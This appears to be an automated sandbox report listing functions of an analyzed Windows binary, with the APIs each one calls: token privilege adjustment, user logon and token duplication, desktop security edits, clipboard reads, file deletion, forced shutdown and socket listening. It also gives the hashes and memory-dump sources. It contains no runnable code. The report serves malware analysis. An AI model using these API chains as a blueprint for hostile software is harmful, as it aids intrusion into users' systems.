                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                                      • Instruction ID: 1ca2853e8765c7c3d576de6e263bbbf33c239e56d331c7fe2371393aed35b0b5
                                                                      • Opcode Fuzzy Hash: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                                      • Instruction Fuzzy Hash: FD311E71A50219BBEB216BB55C8AFBF7EACEB44B50F100065FA01F61D1C6B19910ABA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                                        • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                                        • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C01286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C012A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00C012B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C012D1
                                                                      • GetProcessWindowStation.USER32 ref: 00C012EA
                                                                      • SetProcessWindowStation.USER32 ref: 00C012F4
                                                                      • OpenDesktopW.USER32 ref: 00C01310
                                                                        • Part of subcall function 00C010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                                        • Part of subcall function 00C010BF: CloseHandle.KERNEL32(?), ref: 00C010E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: 1d95713c6986434655b1986e357902059275f46e93ca31da498daef944a23b4d
                                                                      • Instruction ID: da30c6110964fbde314fec59c962c071aab0310094489e4c09208dde435f6f49
                                                                      • Opcode Fuzzy Hash: 1d95713c6986434655b1986e357902059275f46e93ca31da498daef944a23b4d
                                                                      • Instruction Fuzzy Hash: DF818971910209AFDF219FA5DC89FEEBBB9EF04704F184129FD20B61A0D7758A54CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C00B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                        • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                        • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                        • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C00C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C00C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C00CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D7F
                                                                        • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                                        • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                                        • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                                      • Instruction ID: d61d9da36caa3073739ab7af1eb5b95033a4706bd4f4773ca92157847cb0242d
                                                                      • Opcode Fuzzy Hash: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                                      • Instruction Fuzzy Hash: 3771497690020AABDF10DFA4DC84FAEBBB9BF04310F254519E925B6291D775AA05CBB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenClipboard.USER32(00C3CC08), ref: 00C1EB29
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C1EB37
                                                                      • GetClipboardData.USER32 ref: 00C1EB43
                                                                      • CloseClipboard.USER32 ref: 00C1EB4F
                                                                      • GlobalLock.KERNEL32 ref: 00C1EB87
                                                                      • CloseClipboard.USER32 ref: 00C1EB91
                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C1EBBC
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00C1EBC9
                                                                      • GetClipboardData.USER32 ref: 00C1EBD1
                                                                      • GlobalLock.KERNEL32 ref: 00C1EBE2
                                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00C1EC22
                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C1EC38
                                                                      • GetClipboardData.USER32 ref: 00C1EC44
                                                                      • GlobalLock.KERNEL32 ref: 00C1EC55
                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C1EC77
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1EC94
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1ECD2
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C1ECF3
                                                                      • CountClipboardFormats.USER32 ref: 00C1ED14
                                                                      • CloseClipboard.USER32 ref: 00C1ED59
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                      • String ID:
                                                                      • API String ID: 420908878-0
                                                                      • Opcode ID: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                                      • Instruction ID: d55eae1b019832b8122d72694fa83212786bd537139e8593c099aba2e33818d7
                                                                      • Opcode Fuzzy Hash: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                                      • Instruction Fuzzy Hash: 0F61C1352082019FD300EF24D889FAE77E4AF86714F08455DF856E72A1DB31DA85DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C169BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C16A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A75
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16ADF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                                      • Instruction ID: 6f94f553603abdc589d72ce8bb3b7d927a87dc74b15f8ec48a4fe8eb343acf1e
                                                                      • Opcode Fuzzy Hash: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                                      • Instruction Fuzzy Hash: 67D15DB2508300AFC310EBA4CC91EAFB7ECAF89704F04495DF599D6191EB75DA48DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C19642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00C19663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C196A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C196BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C196D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00C196DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C196FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C19768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C19772
                                                                      • FindClose.KERNEL32(00000000), ref: 00C1977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00C1978F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                                      • Instruction ID: 3a9a0b60acf1f460e8aaf9ce011ecd172f3d2155b78eb80ec440f34726d194ce
                                                                      • Opcode Fuzzy Hash: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                                      • Instruction Fuzzy Hash: 4E31D332500219ABDB24AFB4DC99FDE77ACDF4A320F104165F815E20E0DB31DE809B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00C197BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C19819
                                                                      • FindClose.KERNEL32(00000000), ref: 00C19824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C19840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C19890
                                                                      • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C198AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C198B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00C198C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00C198D5
                                                                        • Part of subcall function 00C0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0DB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                                      • Instruction ID: f943555f709fbd82b222a49a15144ef98f9a11497e6672cf628cab04d38663fb
                                                                      • Opcode Fuzzy Hash: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                                      • Instruction Fuzzy Hash: 283185325406196EEB20EFB4EC98BDE77ACDF47320F144165E824A21E0DB31DAC5EB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C0D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D1DD
                                                                      • MoveFileW.KERNEL32 ref: 00C0D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D237
                                                                        • Part of subcall function 00C0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00C0D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D264
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                                      • Instruction ID: 0334b646f60fef2b8c44047477ce6e5d8109348afdacb6ffa31594f4d0c9262b
                                                                      • Opcode Fuzzy Hash: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                                      • Instruction Fuzzy Hash: A5617D3180511DABCF05EBE0DA92AEEB7B5AF15340F2481A5E41277192EB31AF09DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                                      • Instruction ID: ffd54b4d2ac901481512ea035174049497cab296731831480a714cf788bd424d
                                                                      • Opcode Fuzzy Hash: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                                      • Instruction Fuzzy Hash: 8641AE35204611AFD310DF25E889F5ABBE1EF45318F14C099E829DB762C775ED81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                                        • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                                        • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C0E932
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                                      • Instruction ID: c262a52c2d43bc4bc42ab4f7b63ba2e8442ba4500bd0f2b96c9f6b6112d6dd7f
                                                                      • Opcode Fuzzy Hash: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                                      • Instruction Fuzzy Hash: 1601D673660211ABEB6426B59CC6BFF725CA714750F194D21FD13F21D1D5A15D40D290
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C21204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C21276
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21283
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C212BA
                                                                      • WSAGetLastError.WSOCK32 ref: 00C212C5
                                                                      • closesocket.WSOCK32(00000000), ref: 00C212F4
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00C21303
                                                                      • WSAGetLastError.WSOCK32 ref: 00C2130D
                                                                      • closesocket.WSOCK32(00000000), ref: 00C2133C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                                      • Instruction ID: 536b84b721ad27afb6754a906927f4b7fba6d45d070044ef0fb0e434ac1d3677
                                                                      • Opcode Fuzzy Hash: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                                      • Instruction Fuzzy Hash: 71418031A00110DFD710DF24D494B2ABBE6AF56318F188198E8669F6E3C771EE81CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB997D Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 375COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB9A4E
                                                                      • GetSysColor.USER32 ref: 00BB9B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00BB9B36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
